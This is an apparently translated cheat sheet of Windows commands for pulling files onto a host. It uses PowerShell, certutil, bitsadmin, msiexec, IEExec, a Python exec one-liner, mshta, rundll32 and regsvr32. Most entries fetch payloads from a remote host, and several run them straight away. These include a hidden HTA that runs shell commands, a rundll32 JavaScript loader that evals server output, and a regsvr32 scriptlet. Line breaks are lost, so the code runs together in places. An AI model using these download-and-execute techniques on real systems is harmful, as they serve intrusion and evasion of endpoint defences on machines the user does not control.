Summary of the "Tips Summary" command line download file under Windows

0x00 Powershell

Win2003, WinXP not supported

$client = new-object System.Net.WebClient$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)

Download files via IE

$ie = New-Object -Com internetExplorer.Application$ie.Navigate("https://site.com/somefile") #------------------------------#Wait for Download Dialog box to pop upSleep 5while($ie.Busy){Sleep 1}#------------------------------ #Hit "S" on the keyboard to hit the "Save" button on the download box$obj = new-object -com WScript.Shell$obj.AppActivate(‘Internet Explorer‘)$obj.SendKeys(‘s‘) #Hit "Enter" to save the file$obj.SendKeys(‘{Enter}‘) #Closes IE Downloads window$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{Enter}‘)

0x01 FTP

FTP 192.168.3.2

After you enter your user name and password

LCD E:\file # Enter the file directory under the E-drive

CD www # Enter the WWW directory on the server

Get access.log # Download the Access.log on the server to E:\file

Refer to: https://baike.baidu.com/item/ftp/13839

0x02 ipc$

copy \\192.168.3.1\c$\test.exe E:\file

0x03 Certutil

Refer to: https://technet.microsoft.com/zh-cn/library/cc773087 (ws.10). aspx

Applied to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt

0x04 bitsadmin

Refer to: https://msdn.microsoft.com/en-us/library/aa362813 (v=vs.85). aspx

    1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt    2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

0x05 msiexec

msiexec /q /i http://192.168.3.1/test.txt

0x06 ieexec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s offC:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

0x07 python

C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”

0x08 Mshta

mshta http://192.168.3.1/run.hta

Run.hta content is as follows:

<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")objShell.Run "cmd.exe /c net user" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML>

0x09 rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

In fact, it relies on the Wscript.Shell component.

0x10 regsvr32

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

Test.data content:

<?XML version="1.0"?><scriptlet><registration    progid="ShortJSRAT"    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >    <!-- Learn from Casey Smith @subTee -->    <script language="JScript">        <![CDATA[            ps  = "cmd.exe /c calc.exe";            new ActiveXObject("WScript.Shell").Run(ps,0,true);        ]]></script></registration></scriptlet>

You can also use Https://github.com/CroweCybersecurity/ps1encode to generate the SCT (COM scriptlet-requires a webserver to stage the payload)

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

Summary of the "Tips Summary" command line download file under Windows